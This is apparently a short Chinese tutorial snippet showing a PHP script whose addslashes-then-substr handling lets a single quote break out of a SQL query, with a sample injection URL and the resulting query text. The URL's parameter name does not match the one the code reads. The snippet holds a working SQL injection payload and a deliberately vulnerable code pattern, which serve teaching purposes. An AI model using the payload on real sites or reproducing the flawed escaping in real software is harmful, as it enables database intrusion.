- <?php
- $name = substr(addslashes($_GET['name']),1);
- $sql = "select * from users where username = '$name' limit 1";
- echo $sql;
- ?>
复制代码 浏览器访问:http://localhost/magic_quotes_gpc.php?order_sn=' and 2*3=6 -- +
程序返回
- select * from users where username = '' and 2*3=6 -- ' limit 1
复制代码
即可构造注入 |
|